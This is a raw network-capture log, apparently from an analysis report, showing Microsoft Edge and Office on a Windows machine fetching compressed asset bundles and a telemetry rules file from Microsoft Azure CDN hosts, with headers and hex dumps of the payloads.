                                                                                                                                                                                                                                                      Edge-Asset-Group: EntityExtractionDomainsConfig
                                                                                                                                                                                                                                                      Sec-Mesh-Client-Edge-Version: 117.0.2045.47
                                                                                                                                                                                                                                                      Sec-Mesh-Client-Edge-Channel: stable
                                                                                                                                                                                                                                                      Sec-Mesh-Client-OS: Windows
                                                                                                                                                                                                                                                      Sec-Mesh-Client-OS-Version: 10.0.19045
                                                                                                                                                                                                                                                      Sec-Mesh-Client-Arch: x86_64
                                                                                                                                                                                                                                                      Sec-Mesh-Client-WebView: 0
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC576INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:47 GMT
                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                      Content-Length: 70207
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                      Last-Modified: Fri, 22 Nov 2024 21:01:12 GMT
                                                                                                                                                                                                                                                      ETag: 0x8DD0B38CBCCFA90
                                                                                                                                                                                                                                                      x-ms-request-id: 2130ac86-001e-000a-1036-43718e000000
                                                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213847Z-174f78459684bddphC1EWRbht400000011p000000000gqe7
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC15808INData Raw: 1f 8b 08 08 18 f1 40 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7
                                                                                                                                                                                                                                                      Data Ascii: @gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC16384INData Raw: c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97
                                                                                                                                                                                                                                                      Data Ascii: q*b,0Rte*|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;|a``|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC16384INData Raw: c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b
                                                                                                                                                                                                                                                      Data Ascii: Rg|M kt|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX*$Nkct&iZ%b8Zoj@ u2OgA1DG3*5d*lg|9GV>OVzVMPA76.|crkX
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC16384INData Raw: 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc
                                                                                                                                                                                                                                                      Data Ascii: AHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC5247INData Raw: 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e
                                                                                                                                                                                                                                                      Data Ascii: *'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      121192.168.2.104988713.107.246.404432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC470OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1
                                                                                                                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Edge-Asset-Group: Shoreline
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC557INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:47 GMT
                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                      Content-Length: 306698
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                      Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                                                                                                                                                                                      ETag: 0x8DBC9B5C40EBFF4
                                                                                                                                                                                                                                                      x-ms-request-id: 499c7ba9-d01e-0047-0170-43b76c000000
                                                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213847Z-174f78459684db9fhC1EWRc7g400000001y000000000ex4v
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC15827INData Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe
                                                                                                                                                                                                                                                      Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&|'J'~eL|&c~6{JAw^z3cUEeMaTu W/^~b|X_?r~vXwW
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c 87 07 e7 d4 da 16 34 27 65 eb d7 87 be 44 96 29 71 b2 3a d6
                                                                                                                                                                                                                                                      Data Ascii: [T[%6Q+"PR6mU5YgV-HoB /!~qL|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz|PVM&UOu~{-oM5QafAp4'eD)q:
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d d9 e8 78 24 ab 24 51 69 66 82 d7 44 e8 1d cf c8 e2 16 60 37
                                                                                                                                                                                                                                                      Data Ascii: kD$>U|}mlBxz*BFSzP~|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)|[U35QTB-x$$QifD`7
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 6e 30 91 49 05 4e 42 60 22 53 9e 67 6f 08 ac 30 cf 05 cd b5
                                                                                                                                                                                                                                                      Data Ascii: sg9P3[=[b'1\%}~i?2tmA@0!0VC\:*_Gp`n3.e_j;`?ihbE}*Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M,SqPn0INB`"Sgo0
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e 6f 2b 5e 74 f2 ea 6e 17 ed 6d 37 04 2d f5 5a 8e f8 43 2b c3
                                                                                                                                                                                                                                                      Data Ascii: MR\!1Q|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0o*j~~{Y1U}n|?*4>tk,OS]|w}:)y7gg3r#YU]oU~Cl.Vo+^tnm7-ZC+
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 4e 60 6b e1 20 c2 ba 99 b8 6d 1e 51 d5 3c d5 da e1 b5 2c a1
                                                                                                                                                                                                                                                      Data Ascii: yfr;Tt5S};PtEr~*uVOLC=A{5__p*tHt|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\N`k mQ<,
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 45 bf 50 93 bc bc 7d c3 e9 75 22 5d 68 d9 1e 50 8f 5c 23 a1
                                                                                                                                                                                                                                                      Data Ascii: b.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>JcEP}u"]hP\#
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 c6 95 ea 57 bd 73 50 18 1d 54 fb 07 d5 da 41 bd 99 aa 6f 53
                                                                                                                                                                                                                                                      Data Ascii: u\m}v0d'R}g]]OZ&z+gK[|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{OWsPTAoS
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 65 5d 3f 2f 1b ab ff 79 9a 2b b3 79 5d 62 4f 7c d5 ff 34 22
                                                                                                                                                                                                                                                      Data Ascii: Jj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;|.'Ocl7vUh&n{G]%vHN@e]?/y+y]bO|4"
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16384INData Raw: 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 cb e9 d4 75 42 52 43 29 e8 e5 94 bf 82 e4 a6 c8 40 37 67 5f
                                                                                                                                                                                                                                                      Data Ascii: IdqP7J"RUJS<?e3(Z.v4zg9>X#,~0*"1OvD#jK_F(Mu,abs&0`K`|'5Z:-#BoFX1-3JESJY(bJX*@D[93&Pq<jy@^2%S^?`>uBRC)@7g_


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      122192.168.2.104989113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:47 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 3342
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                      x-ms-request-id: 6eac8613-a01e-006f-3091-3f13cd000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
